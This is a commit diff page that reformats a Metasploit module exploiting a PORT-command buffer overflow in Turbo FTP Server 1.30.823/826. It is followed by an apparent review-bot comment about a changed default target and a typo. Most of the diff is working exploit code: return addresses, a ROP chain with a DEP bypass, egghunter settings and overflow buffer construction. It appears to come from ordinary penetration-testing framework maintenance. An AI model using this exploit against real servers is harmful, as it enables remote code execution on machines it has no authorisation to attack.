Code cleanup
parent
6bccfcd376
commit
72d70b6bc2
|
@ -1,7 +1,3 @@
|
||||||
##
|
|
||||||
#
|
|
||||||
##
|
|
||||||
|
|
||||||
##
|
##
|
||||||
# This file is part of the Metasploit Framework and may be subject to
|
# This file is part of the Metasploit Framework and may be subject to
|
||||||
# redistribution and commercial restrictions. Please see the Metasploit
|
# redistribution and commercial restrictions. Please see the Metasploit
|
||||||
|
@ -24,49 +20,45 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
This module exploits the buffer overflow found in the PORT
|
This module exploits the buffer overflow found in the PORT
|
||||||
command in Turbo FTP Server 1.30.823 & 1.30.826.
|
command in Turbo FTP Server 1.30.823 & 1.30.826.
|
||||||
},
|
},
|
||||||
'Author' => [
|
'Author' =>
|
||||||
'Zhao Liang', #Initial Descovery
|
[
|
||||||
'Lincoln', #Metasploit
|
'Zhao Liang', #Initial Descovery
|
||||||
'corelanc0d3r', #Metasploit
|
'Lincoln', #Metasploit
|
||||||
'thelightcosine',#Metasploit
|
'corelanc0d3r', #Metasploit
|
||||||
],
|
'thelightcosine' #Metasploit
|
||||||
|
],
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Version' => '$',
|
|
||||||
'Platform' => [ 'win' ],
|
'Platform' => [ 'win' ],
|
||||||
'References' =>
|
'References' =>
|
||||||
[
|
[
|
||||||
[ 'OSVDB', '85887' ],
|
[ 'OSVDB', '85887' ]
|
||||||
],
|
],
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
{
|
{
|
||||||
'BadChars' => "\x00",
|
'BadChars' => "\x00",
|
||||||
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
|
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
|
||||||
'EncoderOptions' =>
|
'EncoderOptions' => { 'BufferRegister' => 'EDI' }
|
||||||
{
|
|
||||||
'BufferRegister' => 'EDI',
|
|
||||||
}
|
|
||||||
|
|
||||||
},
|
},
|
||||||
'Targets' =>
|
'Targets' =>
|
||||||
[
|
[
|
||||||
[ 'Automatic', {} ],
|
[ 'Automatic', {} ],
|
||||||
['Windows Universal TurboFtp 1.30.823',
|
['Windows Universal TurboFtp 1.30.823',
|
||||||
{
|
{
|
||||||
'Ret' => 0x00411985, # RETN (ROP NOP) [tbssvc.exe]
|
'Ret' => 0x00411985, # RETN (ROP NOP) [tbssvc.exe]
|
||||||
'ver' => 823
|
'ver' => 823
|
||||||
},
|
},
|
||||||
|
|
||||||
],
|
],
|
||||||
[ 'Windows Universal TurboFtp 1.30.826',
|
[ 'Windows Universal TurboFtp 1.30.826',
|
||||||
{
|
{
|
||||||
'Ret' => 0x004fb207, # RETN (ROP NOP) [tbssvc.exe]
|
'Ret' => 0x004fb207, # RETN (ROP NOP) [tbssvc.exe]
|
||||||
'ver' => 826
|
'ver' => 826
|
||||||
},
|
},
|
||||||
],
|
],
|
||||||
],
|
],
|
||||||
|
|
||||||
'DisclosureDate' => 'Oct 03 2012',
|
'DisclosureDate' => 'Oct 03 2012',
|
||||||
'DefaultTarget' => 1))
|
'DefaultTarget' => 0))
|
||||||
end
|
end
|
||||||
|
|
||||||
def check
|
def check
|
||||||
|
@ -82,7 +74,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
|
|
||||||
def create_rop_chain(ver)
|
def create_rop_chain(ver)
|
||||||
|
|
||||||
# rop chain generated with mona.py - www.corelan.be
|
# rop chain generated with mona.py - www.corelan.be
|
||||||
if ver == 823
|
if ver == 823
|
||||||
rop_gadgets =
|
rop_gadgets =
|
||||||
|
@ -93,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
0x00423b95, # XCHG EDX,EDI # RETN [tbssvc.exe]
|
0x00423b95, # XCHG EDX,EDI # RETN [tbssvc.exe]
|
||||||
0x00423a27, # XCHG ESI,EDI # RETN [tbssvc.exe]
|
0x00423a27, # XCHG ESI,EDI # RETN [tbssvc.exe]
|
||||||
0x005d1c99, # POP EBP # RETN [tbssvc.exe]
|
0x005d1c99, # POP EBP # RETN [tbssvc.exe]
|
||||||
0x004cad5d , # & jmp esp [tbssvc.exe]
|
0x004cad5d, # & jmp esp [tbssvc.exe]
|
||||||
0x004ab16b, # POP EBX # RETN [tbssvc.exe]
|
0x004ab16b, # POP EBX # RETN [tbssvc.exe]
|
||||||
0x00000001, # 0x00000001-> ebx
|
0x00000001, # 0x00000001-> ebx
|
||||||
0x005ef7f6, # POP EDX # RETN [tbssvc.exe]
|
0x005ef7f6, # POP EDX # RETN [tbssvc.exe]
|
||||||
|
@ -135,7 +126,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
|
|
||||||
my_target = target
|
my_target = target
|
||||||
if my_target.name == 'Automatic'
|
if my_target.name == 'Automatic'
|
||||||
print_status("Automatically detecting the target")
|
print_status("Automatically detecting the target")
|
||||||
|
@ -162,11 +152,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
eggoptions =
|
eggoptions =
|
||||||
{
|
{
|
||||||
:checksum => true,
|
:checksum => true,
|
||||||
:eggtag => 'w00t',
|
:eggtag => 'w00t',
|
||||||
:depmethod => 'virtualalloc',
|
:depmethod => 'virtualalloc',
|
||||||
:depreg => 'esi'
|
:depreg => 'esi'
|
||||||
}
|
}
|
||||||
|
|
||||||
badchars = "\x00"
|
badchars = "\x00"
|
||||||
hunter,egg = generate_egghunter(payload.encoded, badchars, eggoptions)
|
hunter,egg = generate_egghunter(payload.encoded, badchars, eggoptions)
|
||||||
|
|
||||||
|
@ -182,7 +173,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
buf1 = rand_text_alpha(2012)
|
buf1 = rand_text_alpha(2012)
|
||||||
buf1 << egg
|
buf1 << egg
|
||||||
buf1 << rand_text_alpha(100)
|
buf1 << rand_text_alpha(100)
|
||||||
|
|
||||||
buf2 = rand_text_alpha(4).unpack('C*').join(',')
|
buf2 = rand_text_alpha(4).unpack('C*').join(',')
|
||||||
buf2 << ","
|
buf2 << ","
|
||||||
|
|
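Review bot: The `'DefaultTarget'` value in the second hunk appears to change from 1 to 0, which makes the 'Automatic' entry the default target; that is a behaviour change rather than cleanup, and the commit title "Code cleanup" gives no hint of it. I would either split it into its own commit or state it in the commit description, so that anyone auditing module changes can see when a default moved. The new side also keeps the misspelt comment `#Initial Descovery`; since the Author list is being reformatted anyway, `'Zhao Liang', #Initial Discovery` would fix it. The enclosing `initialize` call starts above the hunk, and the old/new assignment here is inferred from the page's print order and the hunk line counts, so confirm against the raw diff.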